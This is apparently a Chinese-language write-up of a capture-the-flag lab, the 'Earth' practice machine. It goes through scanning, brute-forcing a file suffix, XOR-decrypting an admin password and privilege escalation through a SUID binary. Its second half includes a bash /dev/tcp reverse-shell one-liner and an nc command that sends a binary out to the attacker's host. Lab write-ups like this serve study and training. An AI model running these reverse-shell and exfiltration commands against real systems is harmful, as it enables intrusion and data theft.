本文参考了大佬的文章:
https://blog.gibbons.digital/hacking/2021/11/09/earth.html
好久没做靶机了,周末做做靶机挺好的
老三样,先确定靶机地址
arp-scan -I eth0 192.168.200.1/24
靶机地址192.168.200.131
nmap -A -sS -sC -p- 192.168.200.131
返回来80端口和443端口,
两个重要的DNS:DNS:earth.local, DNS:terratest.earth.local
访问80端口,无法访问
echo “192.168.200.131 earth.local terratest.earth.local”>>/etc/hosts
再次访问,可以访问
下面dirsearch扫目录
dirsearch -u http://terratest.earth.local
dirsearch -u https://terratest.earth.local
dirsearch -u https://earth.local/
dirsearch -u http://earth.local/
HTTPS扫出来一个robots.txt,说不是在这我都不信
进去看看,/testingnotes.*
爆破后缀,自己写脚本吧
import requests
url="https://terratest.earth.local/testingnotes"
suffix=[".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe", ".htm", ".html", ".inc", ".jhtml",
".jsa", ".json", ".jsp", ".log", ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql", ".txt",
".xml"]
for i in suffix:
payload=url+i
res=requests.get(payload,verify=False)
if res.status_code==200:
print(payload+" exists")
python test.py|grep exists爆破出来txt后缀
访问吧
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.//异或加密
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.//textdata.txt
*terra used as username for admin portal.//admin后台用户名是terra
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?//密钥是一周一换
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it’s currently very basic.
有用的信息我都写在注释里了
之前爆破的时候的后台地址
https://earth.local/admin/
用户名terra,密码爆破
看看testdata.txt,一堆文字
earth.local主页里有一堆16进制数字:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
结合hint,应该就是被更换的密钥
这里其实挺坑的,复制粘贴的时候可能会有几个字符差距,然后就会造成两个16进制长度不一样,结果完全变了,密钥的长度是806.所以可以通过
删除最后的字符来达到长度达标
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))
print(len(f))
看看16进制异或出来是个啥
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
可以看出这是个循环
6561727468636c696d6174656368616e67656261643468756d616e73
16进制转字符串
earthclimatechangebad4humans
看上去像密码
登录成功
命令行执行,尝试find / -name flag,找不到userflag????????
弹shell回来,我的ip 192.168.200.128,转换网站https://www.ipaddressguide.com/ip
bash -i >& /dev/tcp/3232286848/1234 0>&1
nc -lvvp 1234
尝试用find但是明显权限不足,先尝试提权吧,先找特权指令
find / -perm -u=s -type f 2>/dev/null
这倒是全查找出来了
发现一个可以的东西哦,/usr/bin/reset_root
尝试./usr/bin/reset_root
很明显不会让你这么轻松的,尝试找错
ltrace /usr/bin/reset_root
显示没有ltrace命令,那么就用nc传回来吧
nc -w 3 192.168.200.128 9999 < /usr/bin/reset_root
nc -lnvp 9999 > reset_root
ok了,家人们,本地ltrace ./reset_root
这次报错就很明显了
少了三文件,touch一下
好了,再次运行,reset_root,发现把root密码都给改了,好家伙,有了root权限不是想干嘛就干嘛
su root
密码:Earth
再次find,发现不回显。。。。。。。
尝试把1.txt传回来,还是空的??????
算了不整了,直接把shell弹回来,还是不回显,也是把我给整无语了
好吧,两个flag分别在
/root/root_flag.txt
/var/earth_web/user_flag.txt
参考视频链接:https://www.bilibili.com/video/BV1Aq4y1B7Sp/
1303
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
